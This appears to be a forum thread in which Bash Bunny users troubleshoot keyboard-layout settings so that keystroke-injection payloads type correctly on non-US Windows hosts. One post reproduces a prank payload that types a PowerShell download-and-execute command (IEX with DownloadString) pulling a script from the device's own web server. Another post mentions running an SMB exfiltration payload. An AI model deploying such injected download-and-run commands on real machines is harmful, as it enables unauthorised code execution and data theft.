aramansky Posted April 1, 2017

Hello everyone,

I want to use my bashbunny with other keyboard layouts to execute some powershell code (via quack) on a windows box. How do I specify another keyboard layout? Where can I get the /root/tools/languages/de.json (and ch, at, si, hr, pl) or other json files for any other keyboard layout?

Thank you very much!

Mr.Pupp3T Posted April 1, 2017

5 hours ago, aramansky said:
> Hello everyone, I want to use my bashbunny with other keyboard layouts to execute some powershell code (via quack) on a windows box. How do I specify another keyboard layout? Where can I get the /root/tools/languages/de.json (and ch, at, si, hr, pl) or other json files for any other keyboard layout? Thank you very much!

So like you want the BB to type in Russian or Chinese, is that what you mean sir?

Blix Posted April 1, 2017

What s/he means is that in order to use the Bunny at all, for any HID-based experiments, one needs to have one's local keyboard mapping, or else experiments (payloads) provided with the BB will fail, since all special characters will be different. E.g. if I run a script with some flags like "-nop -hidden -didden", then instead of this, the following will be the output: "+nop +hidden +didden". Same for / # " = - : and so on, so you can imagine.

Also, it is not possible to change the target system language and input to US, since, because of the difference between the ANSI and ISO keyboard standards, a small number of special characters will still be different.

Therefore, s/he needs to understand two things:
1) How do I set another language in the payload, and
2) Where are any already existing keyboard layout files that are to be put under /root/tools/languages?

/Blix

Decoy Posted April 1, 2017

If you're in the HID attack mode, you can set your keyboard like so:

    Q SET_LANGUAGE DE

Or US, and so on, and so forth.

Decoy Posted April 1, 2017

This is a link to the Rubber Ducky resources folder: https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Encoder/resources

This will show you the available keyboard layouts.

Blix Posted April 1, 2017

Thank you Decoy! Appreciated!

/Blix

Blix Posted April 1, 2017

48 minutes ago, Decoy said:
> This is a link to the Rubber Ducky resources folder: https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Encoder/resources This will show you the available keyboard layouts.

Well, but the format of these files is not suitable for the BB, correct? This is only for the Rubber Ducky. I looked at the us.json file on the BB and that specifies the keys with a six digit code like 02:00:15 (meaning e.g. shift plus key 15 on a US keyboard).

Is there a repository with json BB keyboard files for the bashbunny? If not, would it be possible for someone at Hak5 to convert all these so that thousands of hours worth of good work around the globe is not wasted (if we all have to do this manually)?

/Blix

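An added illustration (not part of any post in this thread, and not Hak5 code) of the effect Blix describes: the device sends key positions, so text encoded for a US layout reads differently on a host set to another layout. The `MM:00:KK` notation follows the post above; the Swedish host layout and the small key tables are assumptions constructed for the example.

```python
import string

SHIFT = 0x02  # left-shift bit of the HID modifier byte

# Letter keys a-z (usage 0x04-0x1D) and space sit in the same place on both layouts.
LETTERS = {(m, 0x04 + i): (c.upper() if m else c)
           for i, c in enumerate(string.ascii_lowercase) for m in (0, SHIFT)}
LETTERS[(0, 0x2C)] = " "

def layout(symbols):
    """Build a (modifier, usage) -> character table from 'plain+shifted' pairs."""
    table = dict(LETTERS)
    for usage, (plain, shifted) in symbols.items():
        table[(0, usage)] = plain
        table[(SHIFT, usage)] = shifted
    return table

# Constructed excerpts covering six symbol keys only (assumption: SE as the host layout).
US = layout({0x20: "3#", 0x2D: "-_", 0x2E: "=+", 0x33: ";:", 0x34: "'\"", 0x38: "/?"})
SE = layout({0x20: "3#", 0x2D: "+?", 0x2E: "´`", 0x33: "öÖ", 0x34: "äÄ", 0x38: "-_"})

def parse_code(code):
    """Split 'MM:00:KK' into (modifier, usage); the middle byte is unused here."""
    mod, _reserved, key = (int(part, 16) for part in code.split(":"))
    return mod, key

def encode(text, table):
    """What the device sends: one key-position code per character of text."""
    inverse = {ch: key for key, ch in table.items()}
    return ["%02x:00:%02x" % inverse[ch] for ch in text]  # KeyError if not in the excerpt

def decode(codes, table):
    """What the host makes of those codes under its own layout."""
    return "".join(table.get(parse_code(c), "\ufffd") for c in codes)

def typed_on_host(text, device_table, host_table):
    return decode(encode(text, device_table), host_table)

if __name__ == "__main__":
    print(encode("-nop", US))                       # codes built with the US table
    print(typed_on_host("-nop -hidden", US, SE))    # mismatch between device and host
    print(typed_on_host("-nop -hidden", SE, SE))    # matching tables round-trip
```
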
Decoy Posted April 1, 2017

I'm pretty sure all of those keyboards are already available for the bash bunny, and I linked it as a reference only. So you can set to any of those languages as I've shown above, using the first 2 letters from each resource.

Blix Posted April 1, 2017

Hi, I checked carefully, tested 10 different language settings and examined the us.json file in root tools languages. Since there are no other files, I guess it is safe to say those keyboards are not available for the BB.

Suggestion: Can we have a forum or subforum with language files?

Is there anyone else out there struggling with this? I have spent at least 20 hours on this language problem so far. Any solutions?

/Blix

Blix Posted April 1, 2017

Aha, there is a payload called DuckyInstall in the BB payloads here https://github.com/hak5darren/bashbunny-payloads/tree/master/payloads/library/DuckyInstall that results in languages being installed!

FINALLY some good news. If this does not work, I WILL BE QUACKKKK!

Decoy Posted April 1, 2017

I forgot about that. I just installed all the tools and everything when I first got the BB and never gave it much thought after that.

Blix Posted April 2, 2017 (edited)

Hi Decoy and friends,

As said above, you can install DuckyInstall by putting it at a switch as a payload and running it. This results in the following language files being put here:

    root@bunny:~/tools/DuckToolkit/ducktoolkit/languages# ls
    be.json ca.json de.json es.json fr.json hr.json no.json se.json us.json
    br.json ch.json dk.json fi.json gb.json it.json pt.json si.json

What I did was to copy the needed .json file (change xx to your language) into the following location in the BB:

    root@bunny:~/tools/DuckToolkit/ducktoolkit/languages# cp xx.json /root/tools/languages/

Now, you can use the following in the payload scripts after the ATTACKMODE HID command (exchange XX with the language letters of the xx.json file you copied):

    Q SET_LANGUAGE XX

I have tried this and for the FIRST time I managed to get a payload to run! Yippie! The payload I tested with was "Faster SMB Exfiltrator" from Darren of Hak5. It worked! Of course, you need to install the tools (run tools-installer just as any payload, put it on a switch and run it) and also log in to the BB using a terminal and from the impacket folder run "python setup.py install" before. After that, it hopefully will work!

/Blix

FredHilbert Posted April 30, 2017

On 02/04/2017 at 2:37 PM, Blix said:
> Hi Decoy and friends, As said above, you can install DuckyInstall by putting it at a switch as a payload and run it. This results in that the following language files are put here

Hi Blix,

I tried to install the CH and BE keyboards. But when I put Duckyinstall in the Switch1 folder and execute it, nothing happens. Can I launch install.sh manually, directly from the SSH console? (Sorry for my English.)

Thank you.

f3r Posted April 30, 2017

Hello,

You have to use this inside your "payload.txt":

    DUCKY_LANG fr

FredHilbert Posted May 5, 2017

On 30/04/2017 at 10:24 PM, f3r said:
> Hello, You have to use this inside the your "payload.txt": DUCKY_LANG fr

Thank you for your answer. But where in the payload? I've tried in the RickRoll prank payload at different locations but the Powershell command is still written in US layout.

    # Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes
    # Blue...............Running Powershell / Waiting for WebServer to start
    # White..............WebServer started starting the rickroll
    # Green..............RickRoll Started, Safe to pull
    LED B 200
    ATTACKMODE HID
    DUCKY_LANG CH
    Q GUI r
    Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
    Q DELAY 300
    Q ENTER
    ATTACKMODE RNDIS_ETHERNET
    source bunny_helpers.sh
    payload_dir=/root/udisk/payloads/$SWITCH_POSITION
    cd $payload_dir
    LED R G B 200
    iptables -A OUTPUT -p udp --dport 53 -j DROP
    python -m SimpleHTTPServer 80 &
    pid=$!
    while ! nc -z localhost 80; do sleep 0.2; done
    sleep 3
    LED G 200
    kill -9 $pid
    exit

Marcussen Posted May 16, 2017

Have you guys found a solution to this? I'm running 1.3 firmware, and unable to get the Bunny to use Danish layout. I've used the DUCKY_LANG xx in my script, and also set it in the config file. I have tried upper and lowercase, but still the same. No Danish special characters and hence, not able to use the scripts. I have all the json files in the language folder.

Do I need to do anything else to get this to work?

Thanks

RazerBlade Posted May 16, 2017

You need to set your language to Swedish. Then it will work.

FredHilbert Posted May 16, 2017

6 hours ago, Marcussen said:
> Have you guys found a solution to this? I'm running 1.3 firmware, and unable to get the Bunny to use Danish layout. I've used the DUCKY_LANG xx in my script, and also set it in the config file. I have tried upper and lowercase, but still the same. No Danish special characters and hence, not able to use the scripts. I have all the json files in the language folder. Do I need to do anything else to get this to work? Thanks

No, sorry. I never found how to set it correctly for our French-Switzerland keyboard layout.

Dave-ee Jones Posted May 16, 2017

The argument you are passing to DUCKY_LANG is a .json file in the languages folder in '/root/udisk/languages'.

E.g. 'DUCKY_LANG us' refers to '/root/udisk/languages/us.json'

So if you are trying to set your language, make sure it is in the languages folder first. Also, best practice is to set the language in the 'config.txt' file on the USB (next to the 'languages' folder). Check your 'version.txt' to make sure you have firmware 1.3 as well.

Marcussen Posted May 17, 2017

Thanks for the replies. Here's where I'm at.

1: Reset the Bash Bunny using the 3 pull-out method and got back to 1.0. At this point Ducky was working using the old methods of choosing language.

2: Updated to 1.3 by downloading the file, checking hash, and copying it to the root, safely eject and reinsert in arm mode. cat version.txt shows 1.3_264

At this point NO ducky language is working. Nothing is written on screen. Here's my very simple payload:

    ATTACKMODE HID
    Q STRING notepad.exe c:\
    Q ENTER

Nothing is written in an open gedit file on Ubuntu, nor notepad on Windows 10.

Is there a way to COMPLETELY clear the Bunny and start all over, or what is going on here? Am I missing something after the upgrade?

After having mounted the nandf and checked in root/udisk/languages all the language.json files are there. I have tried setting both us, da and se in the config.txt. Still nothing.

When SSH'ing in and not having run the mount command, there is no language folder (or any other folders) in /root/udisk/ <- but it's supposed to be that way, right?

I'm kinda lost here guys... Thanks in advance.